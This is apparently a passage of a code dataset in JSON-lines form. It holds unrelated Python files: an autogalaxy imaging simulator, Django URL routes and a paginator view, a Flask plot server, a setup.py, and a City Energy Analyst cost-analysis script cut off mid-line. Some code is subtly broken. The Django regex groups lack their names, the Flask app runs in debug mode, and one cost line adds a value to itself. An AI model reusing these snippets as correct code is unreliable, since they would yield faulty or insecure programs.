mean=1.0, sigma=1.0, lower_limit=0.5, upper_limit=10.0\r\n)\r\n\r\ngalaxy_model = af.Model(ag.Galaxy, redshift=0.5, bulge=bulge, disk=disk)\r\n\r\n\"\"\"\r\n__Sample Instances__\r\n\r\nWithin a for loop, we will now generate instances of each simulated galaxy using the `Model`'s defined above.\r\nThis loop will run for `total_datasets` iterations, which sets the number of galaxies that are simulated.\r\n\r\nEach iteration of the for loop creates a plane and use this to simulate the imaging dataset.\r\n\"\"\"\r\ntotal_datasets = 5\r\n\r\nfor sample_index in range(total_datasets):\r\n dataset_sample_path = path.join(dataset_path, f\"dataset_{sample_index}\")\r\n\r\n while True:\r\n try:\r\n galaxy = galaxy_model.random_instance()\r\n break\r\n except af.exc.PriorLimitException:\r\n continue\r\n\r\n \"\"\"\r\n __Plane__\r\n \r\n Use the sample's lens galaxies to setup a plane, which will generate the image for the \r\n simulated `Imaging` dataset.\r\n \r\n The steps below are expanded on in other `imaging/simulator` scripts, so check them out if anything below is unclear.\r\n \"\"\"\r\n plane = ag.Plane(galaxies=[galaxy])\r\n\r\n plane_plotter = aplt.PlanePlotter(plane=plane, grid=grid)\r\n plane_plotter.figures_2d(image=True)\r\n\r\n dataset = simulator.via_plane_from(plane=plane, grid=grid)\r\n\r\n dataset_plotter = aplt.ImagingPlotter(dataset=dataset)\r\n dataset_plotter.subplot_dataset()\r\n\r\n \"\"\"\r\n __Output__\r\n \r\n Output the simulated dataset to the dataset path as .fits files.\r\n \r\n This uses the updated `dataset_path_sample` which outputs this sample lens to a unique folder.\r\n \"\"\"\r\n dataset.output_to_fits(\r\n data_path=path.join(dataset_sample_path, \"data.fits\"),\r\n psf_path=path.join(dataset_sample_path, \"psf.fits\"),\r\n noise_map_path=path.join(dataset_sample_path, \"noise_map.fits\"),\r\n overwrite=True,\r\n )\r\n\r\n \"\"\"\r\n __Visualize__\r\n \r\n Output a subplot of the simulated dataset, the image and the plane's quantities to the dataset path as .png files.\r\n \"\"\"\r\n mat_plot = aplt.MatPlot2D(\r\n output=aplt.Output(path=dataset_sample_path, format=\"png\")\r\n )\r\n\r\n dataset_plotter = aplt.ImagingPlotter(dataset=dataset, mat_plot_2d=mat_plot)\r\n dataset_plotter.subplot_dataset()\r\n dataset_plotter.figures_2d(data=True)\r\n\r\n plane_plotter = aplt.PlanePlotter(plane=plane, grid=grid, mat_plot_2d=mat_plot)\r\n plane_plotter.subplot()\r\n\r\n \"\"\"\r\n __Plane Output__\r\n\r\n Save the `Plane` in the dataset folder as a .json file, ensuring the true light profiles and galaxies\r\n are safely stored and available to check how the dataset was simulated in the future. \r\n\r\n This can be loaded via the method `Plane.from_json`.\r\n \"\"\"\r\n plane.output_to_json(file_path=path.join(dataset_sample_path, \"plane.json\"))\r\n\r\n \"\"\"\r\n The dataset can be viewed in the \r\n folder `autogalaxy_workspace/imaging/sample/light_sersic_{sample_index]`.\r\n \"\"\"\r\n","sub_path":"scripts/imaging/simulators/samples/sersic_sersic.py","file_name":"sersic_sersic.py","file_ext":"py","file_size_in_byte":7412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"324150562","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls.defaults import *\n\nurl_lesson = r'^lesson/(?P\\d{4})-(?P\\d{1,2})-(?P\\d{1,2})/(?P\\d{3})/(?P\\d{1})/'\nurl_lesson_add = r'add/(?P\\d+)/(?P\\d{1})/'\nurl_lesson_del = r'delete/(?P\\d+)/'\nurl_end = r'$'\n\n\nurlpatterns = patterns('deproc.schedule.views',\n url(r'^$', 'index_now', name='schedule'),\n url(r'^choose/(?:(?P\\d+)/)?$', 'index', name='schedule_index'),\n url(url_lesson + url_end, 'lesson'),\n url(url_lesson + url_lesson_add + url_end, 'add_lesson'),\n url(url_lesson + url_lesson_del + url_end, 'delete_lesson')\n)","sub_path":"deproc/schedule/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"416156473","text":"from flask import Flask, redirect\nimport logging\nimport sys\napp = Flask(__name__)\n\napp.logger.addHandler(logging.StreamHandler(sys.stdout))\napp.logger.setLevel(logging.ERROR)\n\n\n@app.route('/')\ndef main():\n return redirect('/plot1')\n\n\n@app.route('/histogram_of_tweet_mentions_over_time')\ndef plot1():\n # return render_template('My_test_plot.html')\n hist_name = 'tweets_over_time.html'\n import os.path\n if not os.path.exists(hist_name):\n import challenge_q3\n challenge_q3.main()\n import codecs\n with codecs.open(hist_name) as f:\n html = f.read()\n return html\n\n\n@app.route('/tweet_mentions_on_the_world_map')\ndef plot2():\n map_name = 'tweets_locations.html'\n import os.path\n if not os.path.exists(map_name):\n import challenge_q3\n challenge_q3.main()\n import codecs\n with codecs.open(map_name) as f:\n html = f.read()\n return html\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=33507)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"545556595","text":"from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.shortcuts import render_to_response\nfrom zaklad.models import Bet\n\n\ndef paginator(request, page_num=1):\n size = 2\n bets_list = Bet.objects.all().order_by('suspected_result')\n paginator = Paginator(bets_list, size)\n try:\n bets = paginator.page(page_num)\n except PageNotAnInteger:\n bets = paginator.page(1)\n except EmptyPage:\n bets = paginator.page(paginator.num_pages)\n return render_to_response('zaklad/print_page.html', {\n \"bets\": bets,\n \"page_num\": page_num,\n \"page_max\": paginator.num_pages\n })","sub_path":"krzysiowe/zaklad/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"131484529","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '0.1'\n\ntests_require = ['collective.testcaselayer','pysqlite']\n\nsetup(name='apyb.members',\n version=version,\n description=\"APyB Members participation app\",\n long_description=open(\"README.txt\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n # Get more strings from\n # http://pypi.python.org/pypi?:action=list_classifiers\n classifiers=[\n \"Programming Language :: Python\",\n ],\n keywords='Plone, APyB, Brazil',\n author='Ruda Porto Filgueiras',\n author_email='rudazz@gmail.com',\n url='https://github.com/apyb/apyb.members',\n license='GPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['apyb'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'zope.sqlalchemy',\n 'z3c.saconfig',\n 'plone.app.z3cform'\n # -*- Extra requirements: -*-\n ],\n tests_require=tests_require,\n extras_require={'tests': tests_require},\n entry_points=\"\"\"\n # -*- Entry points: -*-\n \"\"\",\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"264014693","text":"\"\"\"\nMulti criteria decision analysis\n\"\"\"\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport json\nimport os\n\nimport pandas as pd\nimport numpy as np\nimport cea.config\nimport cea.inputlocator\nfrom cea.optimization.lca_calculations import lca_calculations\nfrom cea.analysis.multicriteria.optimization_post_processing.electricity_imports_exports_script import electricity_import_and_exports\nfrom cea.technologies.solar.photovoltaic import calc_Cinv_pv\nfrom cea.optimization.constants import PUMP_ETA\nfrom cea.constants import DENSITY_OF_WATER_AT_60_DEGREES_KGPERM3\nfrom cea.optimization.constants import SIZING_MARGIN\nfrom cea.analysis.multicriteria.optimization_post_processing.individual_configuration import calc_opex_PV\nfrom cea.technologies.chiller_vapor_compression import calc_Cinv_VCC\nfrom cea.technologies.chiller_absorption import calc_Cinv\nfrom cea.technologies.cooling_tower import calc_Cinv_CT\nimport cea.optimization.distribution.network_opt_main as network_opt\nfrom cea.analysis.multicriteria.optimization_post_processing.locating_individuals_in_generation_script import locating_individuals_in_generation_script\nfrom cea.technologies.heat_exchangers import calc_Cinv_HEX\nfrom math import ceil, log\n\n\n__author__ = \"Sreepathi Bhargava Krishna\"\n__copyright__ = \"Copyright 2018, Architecture and Building Systems - ETH Zurich\"\n__credits__ = [\"Sreepathi Bhargava Krishna\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Daren Thomas\"\n__email__ = \"cea@arch.ethz.ch\"\n__status__ = \"Production\"\n\n\ndef multi_criteria_main(locator, config):\n # local variables\n generation = config.multi_criteria.generations\n category = \"optimization-detailed\"\n if not os.path.exists(locator.get_address_of_individuals_of_a_generation(generation)):\n data_address = locating_individuals_in_generation_script(generation, locator)\n else:\n data_address = pd.read_csv(locator.get_address_of_individuals_of_a_generation(generation))\n\n # initialize class\n data_generation = preprocessing_generations_data(locator, generation)\n objectives = data_generation['final_generation']['population']\n individual_list = objectives.axes[0].values\n data_processed = preprocessing_cost_data(locator, data_generation['final_generation'], individual_list[0], generation, data_address, config)\n column_names = data_processed.columns.values\n\n compiled_data = pd.DataFrame(np.zeros([len(individual_list), len(column_names)]), columns=column_names)\n\n for i, individual in enumerate(individual_list):\n data_processed = preprocessing_cost_data(locator, data_generation['final_generation'], individual, generation, data_address, config)\n for name in column_names:\n compiled_data.loc[i][name] = data_processed[name][0]\n\n compiled_data = compiled_data.assign(individual=individual_list)\n\n normalized_TAC = (compiled_data['TAC_Mio'] - min(compiled_data['TAC_Mio'])) / (\n max(compiled_data['TAC_Mio']) - min(compiled_data['TAC_Mio']))\n normalized_emissions = (compiled_data['total_emissions_kiloton'] - min(compiled_data['total_emissions_kiloton'])) / (\n max(compiled_data['total_emissions_kiloton']) - min(compiled_data['total_emissions_kiloton']))\n normalized_prim = (compiled_data['total_prim_energy_TJ'] - min(compiled_data['total_prim_energy_TJ'])) / (\n max(compiled_data['total_prim_energy_TJ']) - min(compiled_data['total_prim_energy_TJ']))\n normalized_Capex_total = (compiled_data['Capex_total_Mio'] - min(compiled_data['Capex_total_Mio'])) / (\n max(compiled_data['Capex_total_Mio']) - min(compiled_data['Capex_total_Mio']))\n normalized_Opex = (compiled_data['Opex_total_Mio'] - min(compiled_data['Opex_total_Mio'])) / (\n max(compiled_data['Opex_total_Mio']) - min(compiled_data['Opex_total_Mio']))\n normalized_renewable_share = (compiled_data['renewable_share_electricity'] - min(compiled_data['renewable_share_electricity'])) / (\n max(compiled_data['renewable_share_electricity']) - min(compiled_data['renewable_share_electricity']))\n\n compiled_data = compiled_data.assign(normalized_TAC=normalized_TAC)\n compiled_data = compiled_data.assign(normalized_emissions=normalized_emissions)\n compiled_data = compiled_data.assign(normalized_prim=normalized_prim)\n compiled_data = compiled_data.assign(normalized_Capex_total=normalized_Capex_total)\n compiled_data = compiled_data.assign(normalized_Opex=normalized_Opex)\n compiled_data = compiled_data.assign(normalized_renewable_share=normalized_renewable_share)\n\n compiled_data['TAC_rank'] = compiled_data['normalized_TAC'].rank(ascending=True)\n compiled_data['emissions_rank'] = compiled_data['normalized_emissions'].rank(ascending=True)\n compiled_data['prim_rank'] = compiled_data['normalized_prim'].rank(ascending=True)\n\n # user defined mcda\n compiled_data['user_MCDA'] = compiled_data['normalized_Capex_total'] * config.multi_criteria.capextotal * config.multi_criteria.economicsustainability + \\\n compiled_data['normalized_Opex'] * config.multi_criteria.opex * config.multi_criteria.economicsustainability + \\\n compiled_data['normalized_TAC'] * config.multi_criteria.annualizedcosts * config.multi_criteria.economicsustainability + \\\n compiled_data['normalized_emissions'] *config.multi_criteria.emissions * config.multi_criteria.environmentalsustainability + \\\n compiled_data['normalized_prim'] *config.multi_criteria.primaryenergy * config.multi_criteria.environmentalsustainability + \\\n compiled_data['normalized_renewable_share'] * config.multi_criteria.renewableshare * config.multi_criteria.socialsustainability\n\n compiled_data['user_MCDA_rank'] = compiled_data['user_MCDA'].rank(ascending=True)\n\n compiled_data.to_csv(locator.get_multi_criteria_analysis(generation))\n\n return compiled_data\n\n\ndef preprocessing_generations_data(locator, generations):\n\n data_processed = []\n with open(locator.get_optimization_checkpoint(generations), \"rb\") as fp:\n data = json.load(fp)\n # get lists of data for performance values of the population\n costs_Mio = [round(objectives[0] / 1000000, 2) for objectives in\n data['population_fitness']] # convert to millions\n emissions_kiloton = [round(objectives[1] / 1000000, 2) for objectives in\n data['population_fitness']] # convert to tons x 10^3 (kiloton)\n prim_energy_TJ = [round(objectives[2] / 1000000, 2) for objectives in\n data['population_fitness']] # convert to gigajoules x 10^3 (Terajoules)\n individual_names = ['ind' + str(i) for i in range(len(costs_Mio))]\n\n df_population = pd.DataFrame({'Name': individual_names, 'costs_Mio': costs_Mio,\n 'emissions_kiloton': emissions_kiloton, 'prim_energy_TJ': prim_energy_TJ\n }).set_index(\"Name\")\n\n individual_barcode = [[str(ind) if type(ind) == float else str(ind) for ind in\n individual] for individual in data['population']]\n def_individual_barcode = pd.DataFrame({'Name': individual_names,\n 'individual_barcode': individual_barcode}).set_index(\"Name\")\n\n # get lists of data for performance values of the population (hall_of_fame\n costs_Mio_HOF = [round(objectives[0] / 1000000, 2) for objectives in\n data['halloffame_fitness']] # convert to millions\n emissions_kiloton_HOF = [round(objectives[1] / 1000000, 2) for objectives in\n data['halloffame_fitness']] # convert to tons x 10^3\n prim_energy_TJ_HOF = [round(objectives[2] / 1000000, 2) for objectives in\n data['halloffame_fitness']] # convert to gigajoules x 10^3\n individual_names_HOF = ['ind' + str(i) for i in range(len(costs_Mio_HOF))]\n df_halloffame = pd.DataFrame({'Name': individual_names_HOF, 'costs_Mio': costs_Mio_HOF,\n 'emissions_kiloton': emissions_kiloton_HOF,\n 'prim_energy_TJ': prim_energy_TJ_HOF}).set_index(\"Name\")\n\n # get dataframe with capacity installed per individual\n for i, individual in enumerate(individual_names):\n dict_capacities = data['capacities'][i]\n dict_network = data['disconnected_capacities'][i][\"network\"]\n list_dict_disc_capacities = data['disconnected_capacities'][i][\"disconnected_capacity\"]\n for building, dict_disconnected in enumerate(list_dict_disc_capacities):\n if building == 0:\n df_disc_capacities = pd.DataFrame(dict_disconnected, index=[dict_disconnected['building_name']])\n else:\n df_disc_capacities = df_disc_capacities.append(\n pd.DataFrame(dict_disconnected, index=[dict_disconnected['building_name']]))\n df_disc_capacities = df_disc_capacities.set_index('building_name')\n dict_disc_capacities = df_disc_capacities.sum(axis=0).to_dict() # series with sum of capacities\n\n if i == 0:\n df_disc_capacities_final = pd.DataFrame(dict_disc_capacities, index=[individual])\n df_capacities = pd.DataFrame(dict_capacities, index=[individual])\n df_network = pd.DataFrame({\"network\": dict_network}, index=[individual])\n else:\n df_capacities = df_capacities.append(pd.DataFrame(dict_capacities, index=[individual]))\n df_network = df_network.append(pd.DataFrame({\"network\": dict_network}, index=[individual]))\n df_disc_capacities_final = df_disc_capacities_final.append(\n pd.DataFrame(dict_disc_capacities, index=[individual]))\n\n data_processed.append(\n {'population': df_population, 'halloffame': df_halloffame, 'capacities_W': df_capacities,\n 'disconnected_capacities_W': df_disc_capacities_final, 'network': df_network,\n 'spread': data['spread'], 'euclidean_distance': data['euclidean_distance'],\n 'individual_barcode': def_individual_barcode})\n\n return {'all_generations': data_processed, 'final_generation': data_processed[-1:][0]}\n\ndef preprocessing_cost_data(locator, data_raw, individual, generations, data_address, config):\n\n string_network = data_raw['network'].loc[individual].values[0]\n total_demand = pd.read_csv(locator.get_total_demand())\n building_names = total_demand.Name.values\n individual_barcode_list = data_raw['individual_barcode'].loc[individual].values[0]\n\n # The current structure of CEA has the following columns saved, in future, this will be slightly changed and\n # correspondingly these columns_of_saved_files needs to be changed\n columns_of_saved_files = ['CHP/Furnace', 'CHP/Furnace Share', 'Base Boiler',\n 'Base Boiler Share', 'Peak Boiler', 'Peak Boiler Share',\n 'Heating Lake', 'Heating Lake Share', 'Heating Sewage', 'Heating Sewage Share', 'GHP',\n 'GHP Share',\n 'Data Centre', 'Compressed Air', 'PV', 'PV Area Share', 'PVT', 'PVT Area Share', 'SC_ET',\n 'SC_ET Area Share', 'SC_FP', 'SC_FP Area Share', 'DHN Temperature', 'DHN unit configuration',\n 'Lake Cooling', 'Lake Cooling Share', 'VCC Cooling', 'VCC Cooling Share',\n 'Absorption Chiller', 'Absorption Chiller Share', 'Storage', 'Storage Share',\n 'DCN Temperature', 'DCN unit configuration']\n for i in building_names: # DHN\n columns_of_saved_files.append(str(i) + ' DHN')\n\n for i in building_names: # DCN\n columns_of_saved_files.append(str(i) + ' DCN')\n\n df_current_individual = pd.DataFrame(np.zeros(shape = (1, len(columns_of_saved_files))), columns=columns_of_saved_files)\n for i, ind in enumerate((columns_of_saved_files)):\n df_current_individual[ind] = individual_barcode_list[i]\n\n data_address = data_address[data_address['individual_list'] == individual]\n\n generation_number = data_address['generation_number_address'].values[0]\n individual_number = data_address['individual_number_address'].values[0]\n # get data about the activation patterns of these buildings (main units)\n\n if config.multi_criteria.network_type == 'DH':\n building_demands_df = pd.read_csv(locator.get_optimization_network_results_summary(string_network)).set_index(\n \"DATE\")\n data_activation_path = os.path.join(\n locator.get_optimization_slave_heating_activation_pattern(individual_number, generation_number))\n df_heating = pd.read_csv(data_activation_path).set_index(\"DATE\")\n\n data_activation_path = os.path.join(\n locator.get_optimization_slave_electricity_activation_pattern_heating(individual_number, generation_number))\n df_electricity = pd.read_csv(data_activation_path).set_index(\"DATE\")\n\n # get data about the activation patterns of these buildings (storage)\n data_storage_path = os.path.join(\n locator.get_optimization_slave_storage_operation_data(individual_number, generation_number))\n df_SO = pd.read_csv(data_storage_path).set_index(\"DATE\")\n\n # join into one database\n data_processed = df_heating.join(df_electricity).join(df_SO).join(building_demands_df)\n\n elif config.multi_criteria.network_type == 'DC':\n\n data_costs = pd.read_csv(os.path.join(locator.get_optimization_slave_investment_cost_detailed_cooling(individual_number, generation_number)))\n data_cooling = pd.read_csv(os.path.join(locator.get_optimization_slave_cooling_activation_pattern(individual_number, generation_number)))\n data_electricity = pd.read_csv(os.path.join(locator.get_optimization_slave_electricity_activation_pattern_cooling(individual_number, generation_number)))\n data_emissions = pd.read_csv(os.path.join(locator.get_optimization_slave_investment_cost_detailed(individual_number, generation_number)))\n\n # Total CAPEX calculations\n # Absorption Chiller\n Absorption_chiller_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname=\"Absorption_chiller\",\n usecols=['type', 'code', 'cap_min', 'cap_max', 'a', 'b', 'c', 'd', 'e', 'IR_%',\n 'LT_yr', 'O&M_%'])\n Absorption_chiller_cost_data = Absorption_chiller_cost_data[Absorption_chiller_cost_data['type'] == 'double']\n max_ACH_chiller_size = max(Absorption_chiller_cost_data['cap_max'].values)\n Inv_IR = (Absorption_chiller_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = Absorption_chiller_cost_data.iloc[0]['LT_yr']\n Q_ACH_max_W = data_cooling['Q_from_ACH_W'].max()\n Q_ACH_max_W = Q_ACH_max_W * (1 + SIZING_MARGIN)\n number_of_ACH_chillers = max(int(ceil(Q_ACH_max_W / max_ACH_chiller_size)) , 1)\n Q_nom_ACH_W = Q_ACH_max_W / number_of_ACH_chillers\n Capex_a_ACH, Opex_fixed_ACH = calc_Cinv(Q_nom_ACH_W, locator, 'double', config)\n Capex_total_ACH = (Capex_a_ACH * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT) * number_of_ACH_chillers\n data_costs['Capex_total_ACH'] = Capex_total_ACH\n data_costs['Opex_total_ACH'] = np.sum(data_cooling['Opex_var_ACH']) + data_costs['Opex_fixed_ACH']\n\n # VCC\n VCC_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname=\"Chiller\")\n VCC_cost_data = VCC_cost_data[VCC_cost_data['code'] == 'CH3']\n max_VCC_chiller_size = max(VCC_cost_data['cap_max'].values)\n Inv_IR = (VCC_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = VCC_cost_data.iloc[0]['LT_yr']\n Q_VCC_max_W = data_cooling['Q_from_VCC_W'].max()\n Q_VCC_max_W = Q_VCC_max_W * (1 + SIZING_MARGIN)\n number_of_VCC_chillers = max(int(ceil(Q_VCC_max_W / max_VCC_chiller_size)), 1)\n Q_nom_VCC_W = Q_VCC_max_W / number_of_VCC_chillers\n Capex_a_VCC, Opex_fixed_VCC = calc_Cinv_VCC(Q_nom_VCC_W, locator, config, 'CH3')\n Capex_total_VCC = (Capex_a_VCC * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT) * number_of_VCC_chillers\n data_costs['Capex_total_VCC'] = Capex_total_VCC\n data_costs['Opex_total_VCC'] = np.sum(data_cooling['Opex_var_VCC']) + data_costs['Opex_fixed_VCC']\n\n # VCC Backup\n Q_VCC_backup_max_W = data_cooling['Q_from_VCC_backup_W'].max()\n Q_VCC_backup_max_W = Q_VCC_backup_max_W * (1 + SIZING_MARGIN)\n number_of_VCC_backup_chillers = max(int(ceil(Q_VCC_backup_max_W / max_VCC_chiller_size)), 1)\n Q_nom_VCC_backup_W = Q_VCC_backup_max_W / number_of_VCC_backup_chillers\n Capex_a_VCC_backup, Opex_fixed_VCC_backup = calc_Cinv_VCC(Q_nom_VCC_backup_W, locator, config, 'CH3')\n Capex_total_VCC_backup = (Capex_a_VCC_backup * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT) * number_of_VCC_backup_chillers\n data_costs['Capex_total_VCC_backup'] = Capex_total_VCC_backup\n data_costs['Opex_total_VCC_backup'] = np.sum(data_cooling['Opex_var_VCC_backup']) + data_costs['Opex_fixed_VCC_backup']\n\n # Storage Tank\n storage_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname=\"TES\")\n storage_cost_data = storage_cost_data[storage_cost_data['code'] == 'TES2']\n Inv_IR = (storage_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = storage_cost_data.iloc[0]['LT_yr']\n Capex_a_storage_tank = data_costs['Capex_a_Tank'][0]\n Capex_total_storage_tank = (Capex_a_storage_tank * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT)\n data_costs['Capex_total_storage_tank'] = Capex_total_storage_tank\n data_costs['Opex_total_storage_tank'] = np.sum(data_cooling['Opex_var_VCC_backup']) + data_costs['Opex_fixed_Tank']\n\n # Cooling Tower\n CT_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname=\"CT\")\n CT_cost_data = CT_cost_data[CT_cost_data['code'] == 'CT1']\n max_CT_size = max(CT_cost_data['cap_max'].values)\n Inv_IR = (CT_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = CT_cost_data.iloc[0]['LT_yr']\n Qc_CT_max_W = data_cooling['Qc_CT_associated_with_all_chillers_W'].max()\n number_of_CT = max(int(ceil(Qc_CT_max_W / max_CT_size)), 1)\n Qnom_CT_W = Qc_CT_max_W/number_of_CT\n Capex_a_CT, Opex_fixed_CT = calc_Cinv_CT(Qnom_CT_W, locator, config, 'CT1')\n Capex_total_CT = (Capex_a_CT * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT) * number_of_CT\n data_costs['Capex_total_CT'] = Capex_total_CT\n data_costs['Opex_total_CT'] = np.sum(data_cooling['Opex_var_CT']) + data_costs['Opex_fixed_CT']\n\n # CCGT\n CCGT_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname=\"CCGT\")\n technology_code = list(set(CCGT_cost_data['code']))\n CCGT_cost_data = CCGT_cost_data[CCGT_cost_data['code'] == technology_code[0]]\n Inv_IR = (CCGT_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = CCGT_cost_data.iloc[0]['LT_yr']\n Capex_a_CCGT = data_costs['Capex_a_CCGT'][0]\n Capex_total_CCGT = (Capex_a_CCGT * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT)\n data_costs['Capex_total_CCGT'] = Capex_total_CCGT\n data_costs['Opex_total_CCGT'] = np.sum(data_cooling['Opex_var_CCGT']) + data_costs['Opex_fixed_CCGT']\n\n # pump\n config.restricted_to = None # FIXME: remove this later\n config.thermal_network.network_type = config.multi_criteria.network_type\n config.thermal_network.network_names = []\n network_features = network_opt.network_opt_main(config, locator)\n DCN_barcode = \"\"\n for name in building_names:\n DCN_barcode += str(df_current_individual[name + ' DCN'][0])\n if df_current_individual['Data Centre'][0] == 1:\n df = pd.read_csv(locator.get_optimization_network_data_folder(\"Network_summary_result_\" + hex(int(str(DCN_barcode), 2)) + \".csv\"),\n usecols=[\"mdot_cool_space_cooling_and_refrigeration_netw_all_kgpers\"])\n else:\n df = pd.read_csv(locator.get_optimization_network_data_folder(\"Network_summary_result_\" + hex(int(str(DCN_barcode), 2)) + \".csv\"),\n usecols=[\"mdot_cool_space_cooling_data_center_and_refrigeration_netw_all_kgpers\"])\n mdotA_kgpers = np.array(df)\n mdotnMax_kgpers = np.amax(mdotA_kgpers)\n deltaPmax = np.max((network_features.DeltaP_DCN) * DCN_barcode.count(\"1\") / len(DCN_barcode))\n E_pumping_required_W = mdotnMax_kgpers * deltaPmax / DENSITY_OF_WATER_AT_60_DEGREES_KGPERM3\n P_motor_tot_W = E_pumping_required_W / PUMP_ETA # electricty to run the motor\n Pump_max_kW = 375.0\n Pump_min_kW = 0.5\n nPumps = int(np.ceil(P_motor_tot_W / 1000.0 / Pump_max_kW))\n # if the nominal load (electric) > 375kW, a new pump is installed\n Pump_Array_W = np.zeros((nPumps))\n Pump_Remain_W = P_motor_tot_W\n Capex_total_pumps = 0\n Capex_a_total_pumps = 0\n for pump_i in range(nPumps):\n # calculate pump nominal capacity\n Pump_Array_W[pump_i] = min(Pump_Remain_W, Pump_max_kW * 1000)\n if Pump_Array_W[pump_i] < Pump_min_kW * 1000:\n Pump_Array_W[pump_i] = Pump_min_kW * 1000\n Pump_Remain_W -= Pump_Array_W[pump_i]\n pump_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname=\"Pump\")\n pump_cost_data = pump_cost_data[pump_cost_data['code'] == 'PU1']\n # if the Q_design is below the lowest capacity available for the technology, then it is replaced by the least\n # capacity for the corresponding technology from the database\n if Pump_Array_W[pump_i] < pump_cost_data.iloc[0]['cap_min']:\n Pump_Array_W[pump_i] = pump_cost_data.iloc[0]['cap_min']\n pump_cost_data = pump_cost_data[\n (pump_cost_data['cap_min'] <= Pump_Array_W[pump_i]) & (\n pump_cost_data['cap_max'] > Pump_Array_W[pump_i])]\n Inv_a = pump_cost_data.iloc[0]['a']\n Inv_b = pump_cost_data.iloc[0]['b']\n Inv_c = pump_cost_data.iloc[0]['c']\n Inv_d = pump_cost_data.iloc[0]['d']\n Inv_e = pump_cost_data.iloc[0]['e']\n Inv_IR = (pump_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = pump_cost_data.iloc[0]['LT_yr']\n Inv_OM = pump_cost_data.iloc[0]['O&M_%'] / 100\n InvC = Inv_a + Inv_b * (Pump_Array_W[pump_i]) ** Inv_c + (Inv_d + Inv_e * Pump_Array_W[pump_i]) * log(\n Pump_Array_W[pump_i])\n Capex_total_pumps += InvC\n Capex_a_total_pumps += InvC * (Inv_IR) * (1 + Inv_IR) ** Inv_LT / ((1 + Inv_IR) ** Inv_LT - 1)\n data_costs['Capex_total_pumps'] = Capex_total_pumps\n data_costs['Opex_total_pumps'] = data_costs['Opex_fixed_pump'] + data_costs['Opex_fixed_pump']\n\n # Lake - No lake in singapore, should be modified in future\n data_costs['Opex_fixed_Lake'] = [0]\n data_costs['Opex_total_Lake'] = [0]\n data_costs['Capex_total_Lake'] = [0]\n data_costs['Capex_a_Lake'] = [0]\n\n\n # PV\n pv_installed_area = data_electricity['Area_PV_m2'].max()\n Capex_a_PV, Opex_fixed_PV = calc_Cinv_pv(pv_installed_area, locator, config)\n pv_annual_production_kWh = (data_electricity['E_PV_W'].sum()) / 1000\n Opex_a_PV = calc_opex_PV(pv_annual_production_kWh, pv_installed_area)\n PV_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname=\"PV\")\n technology_code = list(set(PV_cost_data['code']))\n PV_cost_data[PV_cost_data['code'] == technology_code[0]]\n Inv_IR = (PV_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = PV_cost_data.iloc[0]['LT_yr']\n Capex_total_PV = (Capex_a_PV * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT)\n data_costs['Capex_total_PV'] = Capex_total_PV\n data_costs['Opex_total_PV'] = Opex_a_PV + Opex_fixed_PV\n data_costs['Opex_fixed_PV'] = Opex_fixed_PV\n data_costs['Capex_a_PV'] = Capex_a_PV\n\n # Disconnected Buildings\n Capex_total_disconnected = 0\n Opex_total_disconnected = 0\n Capex_a_total_disconnected = 0\n\n for (index, building_name) in zip(DCN_barcode, building_names):\n if index is '0':\n df = pd.read_csv(locator.get_optimization_disconnected_folder_building_result_cooling(building_name,\n configuration='AHU_ARU_SCU'))\n dfBest = df[df[\"Best configuration\"] == 1]\n\n if dfBest['VCC to AHU_ARU_SCU Share'].iloc[0] == 1: #FIXME: Check for other options\n Inv_IR = (VCC_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = VCC_cost_data.iloc[0]['LT_yr']\n\n if dfBest['single effect ACH to AHU_ARU_SCU Share (FP)'].iloc[0] == 1:\n Inv_IR = (Absorption_chiller_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = Absorption_chiller_cost_data.iloc[0]['LT_yr']\n\n Opex_total_disconnected += 